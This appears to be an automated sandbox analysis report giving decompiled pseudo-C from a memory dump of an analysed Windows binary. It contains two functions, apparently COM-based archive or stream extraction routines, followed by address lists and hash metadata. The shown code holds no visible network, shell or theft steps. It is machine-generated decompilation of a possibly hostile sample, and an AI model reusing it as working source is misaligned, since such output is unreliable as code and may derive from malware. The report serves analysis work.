										__eflags =  *( *(_t496 - 0x2c) + 0x24);
										if(__eflags == 0) {
											L123:
											_t486 =  *(_t496 - 0x30);
											 *((intOrPtr*)(_t486 + 0x28)) =  *((intOrPtr*)(_t486 + 0x28)) +  *((intOrPtr*)(_t496 - 0x3c));
											asm("adc [edi+0x2c], ecx");
											 *((intOrPtr*)(_t486 + 0x20)) =  *((intOrPtr*)(_t486 + 0x20)) +  *((intOrPtr*)(_t496 - 0x48));
											asm("adc [edi+0x24], eax");
											continue;
										}
										_push( *((intOrPtr*)(_t494 + 0x1c)));
										 *(_t496 + 0xb) =  *(_t496 + 0xb) & 0x00000000;
										_push( *((intOrPtr*)(_t494 + 0x18)));
										 *(_t496 - 4) = 8;
										_push( *((intOrPtr*)(_t494 + 0x10)));
										_t405 = 1;
										_push(_t405);
										_push(_t496 + 0xb);
										_push(0);
										_push( *(_t496 - 0x24));
										_push( *(_t496 - 0x18));
										_push(_t496 - 0x3c);
										_push(_t488);
										_push(_t494 + 0x30);
										_push( *((intOrPtr*)(_t494 + 0x144)));
										_push( *((intOrPtr*)(_t494 + 0x140)));
										_push( *((intOrPtr*)(_t494 + 0x28))); // executed
										_t317 = E0040BD85(_t496 - 0xa8, __eflags); // executed
										__eflags = _t317 - _t405;
										 *(_t496 + 0x14) = _t317;
										if(_t317 == _t405) {
											L92:
											_t428 =  *(_t496 - 0x2c);
											 *(_t496 - 0x28) = 2;
											__eflags =  *(_t428 + 0x24);
											 *((char*)(_t496 + 0x17)) =  *(_t428 + 0x24) == 0;
											__eflags = _t317 - _t405;
											if(_t317 != _t405) {
												__eflags = _t317 - 0x80004001;
												if(_t317 != 0x80004001) {
													__eflags =  *((char*)(_t496 + 0x17));
													if( *((char*)(_t496 + 0x17)) != 0) {
														__eflags =  *(_t496 + 0xb);
														if( *(_t496 + 0xb) != 0) {
															 *(_t496 - 0x28) = 6;
														}
													}
												} else {
													 *(_t496 - 0x28) = _t405;
												}
											}
											_t402 = E0040D47F( *(_t496 - 0x2c), _t496,  *(_t496 - 0x28));
											__eflags = _t402;
											if(_t402 == 0) {
												__eflags =  *((char*)(_t496 + 0x17));
												if( *((char*)(_t496 + 0x17)) == 0) {
													L122:
													 *(_t496 - 4) = 7;
													goto L123;
												}
												_t319 =  *(_t496 - 0x14);
												__eflags = _t319;
												if(_t319 == 0) {
													goto L122;
												}
												_t320 =  *((intOrPtr*)( *_t319 + 0x14))(_t319, 2, _t488,  *(_t496 - 0x28));
												L112:
												_t485 = _t320;
												__eflags = _t485;
												if(_t485 == 0) {
													goto L122;
												}
												_t321 =  *(_t496 - 0x18);
												 *(_t496 - 4) = 5;
												__eflags = _t321;
												if(_t321 != 0) {
													 *((intOrPtr*)( *_t321 + 8))(_t321);
												}
												_t322 =  *(_t496 - 0x14);
												 *(_t496 - 4) = 4;
												__eflags = _t322;
												if(_t322 != 0) {
													 *((intOrPtr*)( *_t322 + 8))(_t322);
												}
												 *(_t496 - 4) = 3;
												E0040DC5D(_t496 - 0xa8);
												_t324 =  *(_t496 - 0x24);
												 *(_t496 - 4) = 1;
												__eflags = _t324;
												if(_t324 != 0) {
													 *((intOrPtr*)( *_t324 + 8))(_t324);
												}
												_t325 =  *(_t496 - 0x1c);
												 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
												__eflags = _t325;
												if(_t325 != 0) {
													 *((intOrPtr*)( *_t325 + 8))(_t325);
												}
												L121:
												_t326 = _t485;
											} else {
												_t331 =  *(_t496 - 0x18);
												 *(_t496 - 4) = 5;
												__eflags = _t331;
												if(_t331 != 0) {
													 *((intOrPtr*)( *_t331 + 8))(_t331);
												}
												_t332 =  *(_t496 - 0x14);
												 *(_t496 - 4) = 4;
												__eflags = _t332;
												if(_t332 != 0) {
													 *((intOrPtr*)( *_t332 + 8))(_t332);
												}
												 *(_t496 - 4) = 3;
												E0040DC5D(_t496 - 0xa8);
												_t334 =  *(_t496 - 0x24);
												 *(_t496 - 4) = 1;
												__eflags = _t334;
												if(_t334 != 0) {
													 *((intOrPtr*)( *_t334 + 8))(_t334);
												}
												_t335 =  *(_t496 - 0x1c);
												 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
												__eflags = _t335;
												L106:
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t335 + 8))(_t335);
												}
												_t326 = _t402;
											}
											goto L124;
										}
										__eflags = _t317 - 0x80004001;
										if(_t317 == 0x80004001) {
											goto L92;
										}
										__eflags =  *(_t496 + 0xb);
										if( *(_t496 + 0xb) != 0) {
											goto L92;
										}
										__eflags = _t317;
										if(_t317 == 0) {
											_t320 = E0040D47F( *(_t496 - 0x2c), _t496, 2);
											goto L112;
										}
										__eflags =  *(_t496 - 0x18);
										 *(_t496 - 4) = 5;
										if( *(_t496 - 0x18) != 0) {
											_t347 =  *(_t496 - 0x18);
											 *((intOrPtr*)( *_t347 + 8))(_t347);
										}
										_t340 =  *(_t496 - 0x14);
										 *(_t496 - 4) = 4;
										__eflags = _t340;
										if(_t340 != 0) {
											 *((intOrPtr*)( *_t340 + 8))(_t340);
										}
										 *(_t496 - 4) = 3;
										E0040DC5D(_t496 - 0xa8);
										_t342 =  *(_t496 - 0x24);
										 *(_t496 - 4) = 1;
										__eflags = _t342;
										if(_t342 != 0) {
											 *((intOrPtr*)( *_t342 + 8))(_t342);
										}
										_t343 =  *(_t496 - 0x1c);
										 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
										__eflags = _t343;
										if(_t343 != 0) {
											 *((intOrPtr*)( *_t343 + 8))(_t343);
										}
										_t326 =  *(_t496 + 0x14);
										goto L124;
									}
									_t349 =  *(_t496 - 0x18);
									 *(_t496 - 4) = 5;
									__eflags = _t349;
									if(_t349 != 0) {
										 *((intOrPtr*)( *_t349 + 8))(_t349);
									}
									_t350 =  *(_t496 - 0x14);
									 *(_t496 - 4) = 4;
									__eflags = _t350;
									if(_t350 != 0) {
										 *((intOrPtr*)( *_t350 + 8))(_t350);
									}
									 *(_t496 - 4) = 3;
									E0040DC5D(_t496 - 0xa8);
									_t352 =  *(_t496 - 0x24);
									 *(_t496 - 4) = 1;
									__eflags = _t352;
									if(_t352 != 0) {
										 *((intOrPtr*)( *_t352 + 8))(_t352);
									}
									_t353 =  *(_t496 - 0x1c);
									 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
									__eflags = _t353;
									if(_t353 != 0) {
										 *((intOrPtr*)( *_t353 + 8))(_t353);
									}
									_t326 =  *(_t496 + 0x14);
									goto L124;
								} else {
									_t453 =  *((intOrPtr*)(_t494 + 0x60));
									_t358 =  *((intOrPtr*)(_t494 + 0x38));
									_t407 =  *(_t453 + 4 + _t488 * 4);
									 *((intOrPtr*)(_t496 - 0x48)) =  *((intOrPtr*)(_t358 + _t407 * 8)) -  *((intOrPtr*)(_t358 +  *(_t453 + _t488 * 4) * 8));
									asm("sbb ecx, [eax+edi*8+0x4]");
									_t488 =  *(_t496 + 0x14);
									_t475 = _t474 + 1;
									__eflags = _t475;
									 *(_t496 - 0x28) = _t475;
									 *((intOrPtr*)(_t496 - 0x44)) =  *((intOrPtr*)(_t358 + 4 + _t407 * 8));
									_t474 =  *( *((intOrPtr*)(_t494 + 0x160)) + _t488 * 4);
									_t360 =  *(_t496 - 0x20);
									while(1) {
										_t360 = _t360 + 1;
										__eflags = _t360 -  *((intOrPtr*)(_t496 + 0x10));
										if(_t360 >=  *((intOrPtr*)(_t496 + 0x10))) {
											break;
										}
										__eflags =  *(_t496 + 0x1b);
										if( *(_t496 + 0x1b) == 0) {
											_t459 =  *( *((intOrPtr*)(_t496 + 0xc)) + _t360 * 4);
										} else {
											_t459 = _t360;
										}
										_t408 =  *((intOrPtr*)(_t494 + 0x164));
										__eflags =  *((intOrPtr*)(_t408 + _t459 * 4)) - _t488;
										if( *((intOrPtr*)(_t408 + _t459 * 4)) != _t488) {
											break;
										} else {
											__eflags = _t459 -  *(_t496 - 0x28);
											if(_t459 <  *(_t496 - 0x28)) {
												break;
											}
											 *(_t496 - 0x28) = _t459 + 1;
											continue;
										}
									}
									_t361 = _t360 -  *(_t496 - 0x20);
									__eflags = _t361;
									 *(_t496 + 0x14) = _t474;
									 *(_t496 - 0x40) = _t361;
									while(1) {
										__eflags =  *(_t496 + 0x14) -  *(_t496 - 0x28);
										if( *(_t496 + 0x14) >=  *(_t496 - 0x28)) {
											goto L67;
										}
										 *((intOrPtr*)(_t496 - 0x3c)) =  *((intOrPtr*)(_t496 - 0x3c)) +  *((intOrPtr*)(( *(_t496 + 0x14) << 4) +  *((intOrPtr*)(_t494 + 0x88))));
										asm("adc [ebp-0x38], eax");
										 *(_t496 + 0x14) =  *(_t496 + 0x14) + 1;
									}
									goto L67;
								}
							}
							_t368 =  *(_t496 - 0x18);
							 *(_t496 - 4) = 5;
							__eflags = _t368;
							if(_t368 != 0) {
								 *((intOrPtr*)( *_t368 + 8))(_t368);
							}
							_t369 =  *(_t496 - 0x14);
							 *(_t496 - 4) = 4;
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *_t369 + 8))(_t369);
							}
							 *(_t496 - 4) = 3;
							E0040DC5D(_t496 - 0xa8); // executed
							_t371 =  *(_t496 - 0x24);
							 *(_t496 - 4) = 1;
							__eflags = _t371;
							if(_t371 != 0) {
								 *((intOrPtr*)( *_t371 + 8))(_t371);
							}
							_t372 =  *(_t496 - 0x1c);
							 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
							__eflags = _t372;
							if(_t372 != 0) {
								 *((intOrPtr*)( *_t372 + 8))(_t372);
							}
							goto L52;
						}
						_t377 =  *(_t496 - 0x18);
						 *(_t496 - 4) = 5;
						__eflags = _t377;
						if(_t377 != 0) {
							 *((intOrPtr*)( *_t377 + 8))(_t377);
						}
						_t378 =  *(_t496 - 0x14);
						 *(_t496 - 4) = 4;
						__eflags = _t378;
						if(_t378 != 0) {
							 *((intOrPtr*)( *_t378 + 8))(_t378);
						}
						 *(_t496 - 4) = 3;
						E0040DC5D(_t496 - 0xa8);
						_t380 =  *(_t496 - 0x24);
						 *(_t496 - 4) = 1;
						__eflags = _t380;
						if(_t380 != 0) {
							 *((intOrPtr*)( *_t380 + 8))(_t380);
						}
						_t335 =  *(_t496 - 0x1c);
						 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
						__eflags = _t335;
						goto L106;
					}
					 *(_t496 - 4) =  *(_t496 - 4) & 0x00000000;
					__eflags = _t400;
					if(_t400 != 0) {
						 *((intOrPtr*)( *_t400 + 8))(_t400);
					}
					goto L121;
				} else {
					 *(_t496 - 4) =  *(_t496 - 4) & 0;
					if(_t483 != 0) {
						 *((intOrPtr*)( *_t483 + 8))(_t483);
					}
					L52:
					_t326 = 0;
					L124:
					 *[fs:0x0] =  *((intOrPtr*)(_t496 - 0xc));
					return _t326;
				}
			}

0x0040d4b9
0x0040d4c7
0x0040d4cc
0x0040d4d0
0x0040d4d3
0x0040d4d6
0x0040d4d9
0x0040d4de
0x0040d4de
0x0040d4e5
0x0040d4e8
0x0040d4eb
0x0040d4ee
0x0040d4f6
0x0040d4fa
0x0040d502
0x0040d502
0x0040d50a
0x0040d522
0x0040d522
0x0040d525
0x0040d528
0x0040d52b
0x0040d52e
0x00000000
0x00000000
0x0040d530
0x0040d534
0x0040d541
0x0040d536
0x0040d536
0x0040d536
0x0040d54a
0x0040d54d
0x0040d550
0x0040d58f
0x0040d58f
0x00000000
0x0040d552
0x0040d552
0x0040d554
0x0040d55a
0x0040d560
0x0040d563
0x0040d563
0x0040d566
0x0040d566
0x0040d569
0x00000000
0x00000000
0x0040d56e
0x0040d57c
0x0040d582
0x0040d585
0x0040d585
0x0040d58a
0x0040d58a
0x0040d58d
0x00000000
0x0040d58d
0x0040d556
0x0040d558
0x00000000
0x00000000
0x00000000
0x0040d558
0x0040d550
0x0040d5a0
0x0040d5a2
0x0040d5a4
0x0040d5bd
0x0040d5c5
0x0040d5c7
0x0040d5ca
0x0040d5cc
0x0040d5d0
0x0040d5db
0x0040d5db
0x0040d5d2
0x0040d5d7
0x0040d5d7
0x0040d5dd
0x0040d5df
0x0040d5e2
0x0040d5e6
0x0040d5e9
0x0040d5ee
0x0040d5ee
0x0040d5f6
0x0040d5fa
0x0040d607
0x0040d60c
0x0040d61c
0x0040d620
0x0040d622
0x0040d62a
0x0040d62c
0x0040d62f
0x0040d631
0x0040d635
0x0040d640
0x0040d640
0x0040d637
0x0040d63c
0x0040d63c
0x0040d642
0x0040d644
0x0040d648
0x0040d64b
0x0040d64e
0x0040d653
0x0040d653
0x0040d65c
0x0040d65c
0x0040d65f
0x0040d663
0x0040d666
0x0040d66d
0x0040d670
0x0040d673
0x0040d676
0x0040d679
0x0040d67f
0x0040d67f
0x0040d682
0x0040d685
0x0040d68c
0x0040d690
0x0040d692
0x00000000
0x00000000
0x0040d6e4
0x0040d6e7
0x0040d6ea
0x0040d746
0x0040d74a
0x0040d74d
0x0040d750
0x0040d753
0x0040d756
0x0040d75b
0x0040d75b
0x0040d764
0x0040d76b
0x0040d76e
0x0040d771
0x0040d774
0x0040d807
0x0040d80d
0x0040d815
0x0040d823
0x0040d82b
0x0040d82e
0x0040d830
0x0040d833
0x0040d893
0x0040d897
0x0040da83
0x0040da83
0x0040da8c
0x0040da92
0x0040da95
0x0040da9b
0x00000000
0x0040da9b
0x0040d89d
0x0040d8a6
0x0040d8aa
0x0040d8ad
0x0040d8b1
0x0040d8b6
0x0040d8b7
0x0040d8b8
0x0040d8b9
0x0040d8be
0x0040d8c1
0x0040d8c4
0x0040d8c8
0x0040d8c9
0x0040d8ca
0x0040d8d6
0x0040d8dc
0x0040d8dd
0x0040d8e2
0x0040d8e4
0x0040d8e7
0x0040d966
0x0040d966
0x0040d969
0x0040d970
0x0040d974
0x0040d978
0x0040d97a
0x0040d97c
0x0040d981
0x0040d988
0x0040d98c
0x0040d98e
0x0040d992
0x0040d994
0x0040d994
0x0040d992
0x0040d983
0x0040d983
0x0040d983
0x0040d981
0x0040d9a6
0x0040d9a8
0x0040d9aa
0x0040da06
0x0040da0a
0x0040da7f
0x0040da7f
0x00000000
0x0040da7f
0x0040da0c
0x0040da0f
0x0040da11
0x00000000
0x00000000
0x0040da1c
0x0040da1f
0x0040da1f
0x0040da21
0x0040da23
0x00000000
0x00000000
0x0040da25
0x0040da28
0x0040da2c
0x0040da2e
0x0040da33
0x0040da33
0x0040da36
0x0040da39
0x0040da3d
0x0040da3f
0x0040da44
0x0040da44
0x0040da4d
0x0040da51
0x0040da56
0x0040da59
0x0040da5d
0x0040da5f
0x0040da64
0x0040da64
0x0040da67
0x0040da6a
0x0040da6e
0x0040da70
0x0040da75
0x0040da75
0x0040da78
0x0040da78
0x0040d9ac
0x0040d9ac
0x0040d9af
0x0040d9b3
0x0040d9b5
0x0040d9ba
0x0040d9ba
0x0040d9bd
0x0040d9c0
0x0040d9c4
0x0040d9c6
0x0040d9cb
0x0040d9cb
0x0040d9d4
0x0040d9d8
0x0040d9dd
0x0040d9e0
0x0040d9e4
0x0040d9e6
0x0040d9eb
0x0040d9eb
0x0040d9ee
0x0040d9f1
0x0040d9f5
0x0040d9f7
0x0040d9f7
0x0040d9fc
0x0040d9fc
0x0040d9ff
0x0040d9ff
0x00000000
0x0040d9aa
0x0040d8e9
0x0040d8ee
0x00000000
0x00000000
0x0040d8f0
0x0040d8f4
0x00000000
0x00000000
0x0040d8f6
0x0040d8f8
0x0040d95c
0x00000000
0x0040d95c
0x0040d8fa
0x0040d8fe
0x0040d902
0x0040d904
0x0040d90a
0x0040d90a
0x0040d90d
0x0040d910
0x0040d914
0x0040d916
0x0040d91b
0x0040d91b
0x0040d924
0x0040d928
0x0040d92d
0x0040d930
0x0040d934
0x0040d936
0x0040d93b
0x0040d93b
0x0040d93e
0x0040d941
0x0040d945
0x0040d947
0x0040d94c
0x0040d94c
0x0040d94f
0x00000000
0x0040d94f
0x0040d835
0x0040d838
0x0040d83c
0x0040d83e
0x0040d843
0x0040d843
0x0040d846
0x0040d849
0x0040d84d
0x0040d84f
0x0040d854
0x0040d854
0x0040d85d
0x0040d861
0x0040d866
0x0040d869
0x0040d86d
0x0040d86f
0x0040d874
0x0040d874
0x0040d877
0x0040d87a
0x0040d87e
0x0040d880
0x0040d885
0x0040d885
0x0040d888
0x00000000
0x0040d77a
0x0040d77a
0x0040d77d
0x0040d780
0x0040d78d
0x0040d794
0x0040d79e
0x0040d7a1
0x0040d7a1
0x0040d7a2
0x0040d7a5
0x0040d7a8
0x0040d7ab
0x0040d7ae
0x0040d7ae
0x0040d7af
0x0040d7b2
0x00000000
0x00000000
0x0040d7b4
0x0040d7b8
0x0040d7c1
0x0040d7ba
0x0040d7ba
0x0040d7ba
0x0040d7c4
0x0040d7ca
0x0040d7cd
0x00000000
0x0040d7cf
0x0040d7cf
0x0040d7d2
0x00000000
0x00000000
0x0040d7d5
0x00000000
0x0040d7d5
0x0040d7cd
0x0040d7da
0x0040d7da
0x0040d7dd
0x0040d7e0
0x0040d7e3
0x0040d7e6
0x0040d7e9
0x00000000
0x00000000
0x0040d7fc
0x0040d7ff
0x0040d802
0x0040d802
0x00000000
0x0040d7e3
0x0040d774
0x0040d6ec
0x0040d6ef
0x0040d6f3
0x0040d6f5
0x0040d6fa
0x0040d6fa
0x0040d6fd
0x0040d700
0x0040d704
0x0040d706
0x0040d70b
0x0040d70b
0x0040d714
0x0040d718
0x0040d71d
0x0040d720
0x0040d724
0x0040d726
0x0040d72b
0x0040d72b
0x0040d72e
0x0040d731
0x0040d735
0x0040d737
0x0040d73c
0x0040d73c
0x00000000
0x0040d737
0x0040d694
0x0040d697
0x0040d69b
0x0040d69d
0x0040d6a2
0x0040d6a2
0x0040d6a5
0x0040d6a8
0x0040d6ac
0x0040d6ae
0x0040d6b3
0x0040d6b3
0x0040d6bc
0x0040d6c0
0x0040d6c5
0x0040d6c8
0x0040d6cc
0x0040d6ce
0x0040d6d3
0x0040d6d3
0x0040d6d6
0x0040d6d9
0x0040d6dd
0x00000000
0x0040d6dd
0x0040d5a6
0x0040d5aa
0x0040d5ac
0x0040d5b5
0x0040d5b5
0x00000000
0x0040d50c
0x0040d50c
0x0040d511
0x0040d51a
0x0040d51a
0x0040d73f
0x0040d73f
0x0040db7d
0x0040db82
0x0040db8b
0x0040db8b

APIs

__EH_prolog.LIBCMT ref: 0040D4B9

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bab2c70395a9ac63ff2a1e6cf90ccf3ca4ad1d567fbb6c2056be4227cc6cc286
Instruction ID: f668b284c9a992d87cd6d5ed2065a62fb7c1b42155693d61c0c1031baec4afb4
Opcode Fuzzy Hash: bab2c70395a9ac63ff2a1e6cf90ccf3ca4ad1d567fbb6c2056be4227cc6cc286
Instruction Fuzzy Hash: 9F327F70E04249DFDF11CFE8C984BAEBBB5AF49304F1440AAE845A7391C779AE49CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0040A90A, Relevance: 2.0, APIs: 1, Instructions: 486
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040A90A(signed int __ecx, void* __eflags) {
				void* _t241;
				void* _t244;
				signed int _t245;
				signed int _t246;
				signed int* _t247;
				signed int _t248;
				signed int* _t252;
				signed int* _t255;
				signed int _t256;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				void* _t262;
				signed int* _t263;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr* _t284;
				void* _t288;
				void*** _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t335;
				signed int _t341;
				intOrPtr* _t356;
				signed int _t360;
				signed int _t362;
				signed int _t365;
				signed int _t381;
				void** _t418;
				signed int _t420;
				signed int _t421;
				signed int _t424;
				signed int _t426;
				void*** _t434;
				signed int _t441;
				signed int** _t459;
				signed int _t460;
				signed int _t461;
				intOrPtr _t465;
				void* _t469;
				void* _t471;
				void* _t472;
				void* _t474;

				E00418D80(E00419E9D, _t469);
				_t472 = _t471 - 0x290;
				 *(_t469 - 0x1c) = __ecx;
				E0040A8E3(__ecx, __eflags);
				_t356 =  *((intOrPtr*)(_t469 + 8));
				if(( *(_t356 + 0x28))[1] < 0x20) {
					while(1) {
						 *(_t469 - 0x20) =  *(_t469 - 0x20) & 0x00000000;
						_t241 = E004028F5(_t469 - 0x29c);
						_t360 = 8;
						_t244 = memcpy(_t356 + 8, _t241, _t360 << 2);
						_t472 = _t472 + 0xc;
						__eflags =  *_t244 - 1;
						if( *_t244 < 1) {
							goto L7;
						}
						L3:
						E004028F5(_t469 - 0xbc);
						_t434 =  *(_t356 + 0x28);
						_t465 =  *((intOrPtr*)( *(_t469 - 0x1c) + 4));
						_t418 = _t434[1];
						__eflags = _t465 - _t418;
						if(_t465 >= _t418) {
							_t420 = 8;
							memcpy(_t469 - 0xbc,  *( *_t434), _t420 << 2);
							_t474 = _t472 + 0xc;
							_t362 = 0;
							__eflags =  *((char*)(_t469 - 0xac));
							if( *((char*)(_t469 - 0xac)) == 0) {
								goto L63;
							}
							goto L6;
						} else {
							_t424 = 8;
							memcpy(_t469 - 0xbc,  *( *_t434 + (_t418 - _t465) * 4 - 4), _t424 << 2);
							_t474 = _t472 + 0xc;
							L6:
							_t421 = 8;
							_t244 = memcpy(_t356 + 8, _t469 - 0xbc, _t421 << 2);
							_t472 = _t474 + 0xc;
							L8:
							_t426 =  *(_t469 - 0x1c);
							_t441 = 0;
							_t365 =  *(_t426 + 4);
							__eflags = _t365;
							if(_t365 != 0) {
								__eflags =  *_t244 - _t365;
								_t459 =  *( *_t426 + _t365 * 4 - 4);
								 *(_t469 - 0x4c) = _t459;
								if( *_t244 > _t365) {
									 *(_t469 - 0x20) = 0x80004001;
								}
								 *(_t469 - 0x44) = _t441;
								 *(_t469 - 0x42) = _t441;
								 *(_t469 - 0x3c) = _t441;
								_t247 =  *_t459;
								 *(_t469 - 4) = 1;
								_t248 =  *((intOrPtr*)( *_t247 + 0x20))(_t247, 1, _t469 - 0x44);
								__eflags = _t248 - _t441;
								if(_t248 != _t441) {
									L42:
									_t460 = _t248;
									E00405DEF(_t469 - 0x44);
									L72:
									_t246 = _t460;
									goto L65;
								}
								__eflags =  *(_t469 - 0x44) - 0x13;
								if( *(_t469 - 0x44) != 0x13) {
									_t362 = _t469 - 0x44;
									L84:
									E00405DEF(_t362);
									L64:
									_t245 =  *(_t469 - 0x1c);
									__eflags =  *((intOrPtr*)(_t245 + 4)) - _t441;
									_t205 =  *((intOrPtr*)(_t245 + 4)) != _t441;
									__eflags = _t205;
									 *((char*)(_t245 + 0x20)) = _t362 & 0xffffff00 | _t205;
									_t246 =  *(_t469 - 0x20);
									goto L65;
								}
								 *(_t469 - 0x24) =  *(_t469 - 0x3c);
								_t252 =  *_t459;
								_t248 =  *((intOrPtr*)( *_t252 + 0x14))(_t252, _t469 - 0x48);
								__eflags = _t248 - _t441;
								if(_t248 != _t441) {
									goto L42;
								}
								_t362 = _t469 - 0x44;
								__eflags =  *(_t469 - 0x24) -  *((intOrPtr*)(_t469 - 0x48));
								if( *(_t469 - 0x24) >=  *((intOrPtr*)(_t469 - 0x48))) {
									goto L84;
								}
								E00405DEF(_t362);
								 *(_t469 - 0x10) = _t441;
								_t255 =  *_t459;
								_t362 =  *_t255;
								 *(_t469 - 4) = 2;
								_t256 =  *_t362(_t255, 0x41b210, _t469 - 0x10);
								__eflags = _t256;
								_t257 =  *(_t469 - 0x10);
								if(_t256 != 0) {
									L82:
									 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
									L79:
									__eflags = _t257 - _t441;
									if(_t257 != _t441) {
										_t362 =  *_t257;
										 *((intOrPtr*)(_t362 + 8))(_t257);
									}
									goto L64;
								}
								__eflags = _t257 - _t441;
								if(_t257 == _t441) {
									goto L82;
								}
								 *(_t469 - 0x14) = _t441;
								_t362 =  *_t257;
								 *(_t469 - 4) = 3;
								_t259 =  *((intOrPtr*)(_t362 + 0xc))(_t257,  *(_t469 - 0x24), _t469 - 0x14);
								__eflags = _t259;
								_t260 =  *(_t469 - 0x14);
								if(_t259 != 0) {
									L81:
									 *(_t469 - 4) = 2;
									L76:
									__eflags = _t260 - _t441;
									if(_t260 != _t441) {
										_t362 =  *_t260;
										 *((intOrPtr*)(_t362 + 8))(_t260);
									}
									_t228 = _t469 - 4;
									 *_t228 =  *(_t469 - 4) | 0xffffffff;
									__eflags =  *_t228;
									_t257 =  *(_t469 - 0x10);
									goto L79;
								}
								__eflags = _t260 - _t441;
								if(_t260 == _t441) {
									goto L81;
								}
								 *(_t469 - 0x18) = _t441;
								_t362 =  *_t260;
								 *(_t469 - 4) = 4;
								_t262 =  *_t362(_t260, 0x41b390, _t469 - 0x18);
								__eflags = _t262 - _t441;
								_t263 =  *(_t469 - 0x18);
								if(_t262 != _t441) {
									L73:
									__eflags = _t263 - _t441;
									 *(_t469 - 4) = 3;
									if(_t263 != _t441) {
										_t362 =  *_t263;
										 *((intOrPtr*)(_t362 + 8))(_t263);
									}
									_t260 =  *(_t469 - 0x14);
									 *(_t469 - 4) = 2;
									goto L76;
								}
								__eflags = _t263 - _t441;
								if(_t263 == _t441) {
									goto L73;
								}
								E0040AF06(_t469 - 0x19c);
								 *(_t469 - 4) = 5;
								_t267 = E00409683(_t459,  *(_t469 - 0x24), _t469 - 0x12c);
								__eflags = _t267 - _t441;
								 *(_t469 - 0x20) = _t267;
								if(_t267 != _t441) {
									 *(_t469 - 4) = 4;
									E00402F6E(_t469 - 0x19c);
									_t269 =  *(_t469 - 0x18);
									 *(_t469 - 4) = 3;
									__eflags = _t269 - _t441;
									if(_t269 != _t441) {
										 *((intOrPtr*)( *_t269 + 8))(_t269);
									}
									_t270 =  *(_t469 - 0x14);
									 *(_t469 - 4) = 2;
									__eflags = _t270 - _t441;
									if(_t270 != _t441) {
										 *((intOrPtr*)( *_t270 + 8))(_t270);
									}
									_t271 =  *(_t469 - 0x10);
									 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
									__eflags = _t271 - _t441;
									if(_t271 != _t441) {
										 *((intOrPtr*)( *_t271 + 8))(_t271);
									}
									_t246 =  *(_t469 - 0x20);
									goto L65;
								}
								_t461 =  *(_t469 - 0x24);
								_t276 = E00409616( *_t459, _t461, 0x56, _t469 + 0xb);
								__eflags = _t276 - _t441;
								 *(_t469 - 0x20) = _t276;
								if(_t276 != _t441) {
									 *(_t469 - 4) = 4;
									E00402F6E(_t469 - 0x19c);
									_t278 =  *(_t469 - 0x18);
									 *(_t469 - 4) = 3;
									__eflags = _t278 - _t441;
									if(_t278 != _t441) {
										 *((intOrPtr*)( *_t278 + 8))(_t278);
									}
									_t279 =  *(_t469 - 0x14);
									 *(_t469 - 4) = 2;
									__eflags = _t279 - _t441;
									if(_t279 != _t441) {
										 *((intOrPtr*)( *_t279 + 8))(_t279);
									}
									_t280 =  *(_t469 - 0x10);
									 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
									__eflags = _t280 - _t441;
									if(_t280 != _t441) {
										 *((intOrPtr*)( *_t280 + 8))(_t280);
									}
									_t246 =  *(_t469 - 0x20);
									goto L65;
								}
								_t284 =  *((intOrPtr*)(_t356 + 0x38));
								__eflags = _t284 - _t441;
								if(_t284 != _t441) {
									 *(_t469 - 0x28) = _t441;
									 *(_t469 - 4) = 6;
									 *((intOrPtr*)( *_t284))(_t284, 0x41b200, _t469 - 0x28);
									_t335 =  *(_t469 - 0x28);
									__eflags = _t335 - _t441;
									if(_t335 != _t441) {
										 *((intOrPtr*)( *_t335 + 0xc))(_t335,  *((intOrPtr*)(_t469 - 0x12c)));
										_t335 =  *(_t469 - 0x28);
									}
									__eflags = _t335 - _t441;
									 *(_t469 - 4) = 5;
									if(_t335 != _t441) {
										 *((intOrPtr*)( *_t335 + 8))(_t335);
									}
								}
								 *(_t469 - 0x104) = _t461;
								 *(_t469 - 0x34) = _t441;
								 *(_t469 - 0x30) = _t441;
								 *(_t469 - 0x2c) = _t441;
								 *(_t469 - 4) = 7;
								E004028C3(_t469 - 0x9c);
								 *((intOrPtr*)(_t469 - 0x9c)) =  *_t356;
								_t381 = 8;
								 *(_t469 - 4) = 8;
								_t288 = memcpy(_t469 - 0x94, _t356 + 8, _t381 << 2);
								_t472 = _t472 + 0xc;
								 *(_t469 - 0x80) = _t288;
								 *(_t469 - 0x5c) =  *(_t469 - 0x5c) & 0x00000000;
								 *((intOrPtr*)(_t469 - 0x70)) = _t469 - 0x34;
								 *(_t469 - 0x6c) =  *(_t469 - 0x18);
								E004037D2(_t469 - 0x58, _t469 - 0x12c);
								 *((intOrPtr*)(_t469 - 0x64)) =  *((intOrPtr*)(_t356 + 0x38));
								 *((intOrPtr*)(_t469 - 0x60)) =  *((intOrPtr*)(_t356 + 0x3c));
								_push(_t469 - 0x9c);
								_t460 = E0040A2C8(_t469 - 0x19c);
								_t297 =  *(_t356 + 0x28);
								_t298 = _t297[1];
